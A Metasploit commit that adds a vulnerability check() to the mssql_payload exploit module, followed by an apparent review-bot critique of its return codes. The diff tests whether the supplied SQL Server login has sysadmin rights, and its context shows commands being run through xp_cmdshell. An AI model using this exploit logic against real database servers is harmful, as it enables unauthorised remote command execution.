Land #4660 - Add a check() for mssql_payload

bug/bundler_fix
sinn3r 2015-01-28 15:47:33 -06:00
commit 53af758a03
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 17 additions and 0 deletions


@ -68,6 +68,23 @@ class Metasploit3 < Msf::Exploit::Remote
]) ])
end end
def check
if (not mssql_login_datastore)
vprint_status("Invalid SQL Server credentials")
return Exploit::CheckCode::Detected
end
mssql_query("select @@version", true)
if mssql_is_sysadmin
vprint_good "User #{datastore['USERNAME']} is a sysadmin"
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
ensure
disconnect
end
# This is method required for the CmdStager to work... # This is method required for the CmdStager to work...
def execute_command(cmd, opts) def execute_command(cmd, opts)
mssql_xpcmdshell(cmd, datastore['VERBOSE']) mssql_xpcmdshell(cmd, datastore['VERBOSE'])
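Review bot: The `else` branch of the new `check` returns `Exploit::CheckCode::Safe` whenever `mssql_is_sysadmin` is false, but that result only shows that the configured account lacks the sysadmin role, not that the server itself is unaffected. Anyone reading the check output as an assessment would see "safe" for a host that may still be exposed through another login, so `Exploit::CheckCode::Detected` with a message such as `vprint_status("User #{datastore['USERNAME']} is not a sysadmin")` would describe the finding more accurately. The failed-login branch prints "Invalid SQL Server credentials" for any falsy return of `mssql_login_datastore`; if that helper can also fail for connection reasons (not visible here), the message should say so. The result of `mssql_query("select @@version", true)` is discarded, so a short comment such as `# print the server version in verbose output` (presumably what the `true` argument is for) would explain why the call is there. As a style point, `if (not mssql_login_datastore)` reads better as `unless mssql_login_datastore`.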